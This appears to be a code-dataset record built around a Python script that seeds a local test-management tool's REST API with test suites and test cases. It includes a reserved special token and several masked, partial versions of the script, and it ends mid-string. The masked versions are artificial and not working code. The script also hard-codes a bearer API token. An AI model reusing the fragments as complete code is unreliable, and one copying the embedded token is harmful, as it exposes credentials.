headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test suite" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without details" }""" conn.request('POST', '/api/v1/testcases', payload, 
headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case with details" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Create test case without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Check if overview contains case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 3, "Name": "Edit test case" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Create test set and run" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create project" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without name" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create set without tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Edit test set" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Create 
test run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Overview contains run" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 4, "Name": "Execute contains tests" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "Name": "Registration and log test" }""" conn.request('POST', '/api/v1/testsuites', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Redirect to login page" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registration" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Registrate same user" }""" conn.request('POST', '/api/v1/testcases', payload, headers) res = conn.getresponse() data = res.read() payload = """{ "TestSuite_id": 5, "Name": "Log and logout" }""" conn.request('POST', '/api/v1/testcases', payload, headers) <|reserved_special_token_1|> # Basic script which send some request via rest api to the test-management-tool. 
# Be sure you setup host and api_token variable import http.client host = "localhost:8000" api_token = "fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3" # Connection conn = http.client.HTTPConnection(host) # Create a header of http request headers = { 'authorization': "Bearer " + api_token, 'content-type': "application/json", 'cache-control': "no-cache", 'postman-token': "44709a5c-ca4a-bbce-4b24-f0632a29bde4" } ################################################ payload = "{\n \"Name\": \"Create and edit project\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"Name\": \"Create and edit requirement\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Not selected project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Check if overview contains project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 1,\n \"Name\": \"Edit project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ ### payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Create project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Create 
requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Overview contains requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Edit requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 2,\n \"Name\": \"Cover requirement\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ payload = "{\n \"Name\": \"Create and edit TestSuites and TestCase\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains suite\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test suite\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without details\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = 
res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case with details\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains case\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test case\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ payload = "{\n \"Name\": \"Create test set and run\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create project\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains set\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without name\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without tests\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Edit test set\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = 
conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Create test run\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains run\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 4,\n \"Name\": \"Execute contains tests\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() ################################################ payload = "{\n \"Name\": \"Registration and log test\"\n}" conn.request("POST", "/api/v1/testsuites", payload, headers) ### res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Redirect to login page\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Registration\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Registrate same user\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers) res = conn.getresponse() data = res.read() payload = "{\n \"TestSuite_id\": 5,\n \"Name\": \"Log and logout\"\n}" conn.request("POST", "/api/v1/testcases", payload, headers)
flexible
{ "blob_id": "0cc1aaa182fcf002ff2ae6cbcd6cbb84a08a3bc1", "index": 936, "step-1": "<mask token>\n", "step-2": "<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask 
token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testsuites', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n<mask token>\nconn.request('POST', '/api/v1/testcases', payload, headers)\n", "step-3": "<mask token>\nhost = 'localhost:8000'\napi_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3'\nconn = http.client.HTTPConnection(host)\nheaders = {'authorization': 'Bearer ' + api_token, 'content-type':\n 'application/json', 'cache-control': 'no-cache', 'postman-token':\n '44709a5c-ca4a-bbce-4b24-f0632a29bde4'}\npayload = \"\"\"{\n \"Name\": \"Create and edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Not selected project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, 
headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Check if overview contains project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Overview contains requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Cover requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit TestSuites and TestCase\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = 
res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case with details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create test set and run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = 
\"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Edit test set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create test run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Execute contains tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Registration and log test\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Redirect to login 
page\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registration\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registrate same user\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Log and logout\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\n", "step-4": "import http.client\nhost = 'localhost:8000'\napi_token = 'fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3'\nconn = http.client.HTTPConnection(host)\nheaders = {'authorization': 'Bearer ' + api_token, 'content-type':\n 'application/json', 'cache-control': 'no-cache', 'postman-token':\n '44709a5c-ca4a-bbce-4b24-f0632a29bde4'}\npayload = \"\"\"{\n \"Name\": \"Create and edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Not selected project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Create project without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Check 
if overview contains project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 1,\n \"Name\": \"Edit project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Create requirement without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Overview contains requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Edit requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 2,\n \"Name\": \"Cover requirement\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create and edit TestSuites and TestCase\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test suite without 
name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test suite\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case with details\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Create test case without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Check if overview contains case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 3,\n \"Name\": \"Edit test case\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Create test set and run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create project\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set\"\n}\"\"\"\nconn.request('POST', 
'/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without name\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create set without tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Edit test set\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Create test run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Overview contains run\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 4,\n \"Name\": \"Execute contains tests\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"Name\": \"Registration and log test\"\n}\"\"\"\nconn.request('POST', '/api/v1/testsuites', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Redirect to login page\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registration\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = 
res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Registrate same user\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\nres = conn.getresponse()\ndata = res.read()\npayload = \"\"\"{\n \"TestSuite_id\": 5,\n \"Name\": \"Log and logout\"\n}\"\"\"\nconn.request('POST', '/api/v1/testcases', payload, headers)\n", "step-5": "# Basic script which send some request via rest api to the test-management-tool.\n# Be sure you setup host and api_token variable\n\nimport http.client\n\nhost = \"localhost:8000\"\napi_token = \"fuukp8LhdxxwoVdtJu5K8LQtpTods8ddLMq66wSUFXGsqJKpmJAa1YyqkHN3\"\n\n# Connection\nconn = http.client.HTTPConnection(host)\n\n# Create a header of http request\nheaders = {\n 'authorization': \"Bearer \" + api_token,\n 'content-type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'postman-token': \"44709a5c-ca4a-bbce-4b24-f0632a29bde4\"\n }\n\n################################################\npayload = \"{\\n \\\"Name\\\": \\\"Create and edit project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n###\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"Name\\\": \\\"Create and edit requirement\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testsuites\", payload, headers)\n\nres = conn.getresponse()\ndata = res.read()\n\npayload = \"{\\n \\\"TestSuite_id\\\": 1,\\n \\\"Name\\\": \\\"Not selected project\\\"\\n}\"\nconn.request(\"POST\", \"/api/v1/testcases\", payload, headers)\n\nres = 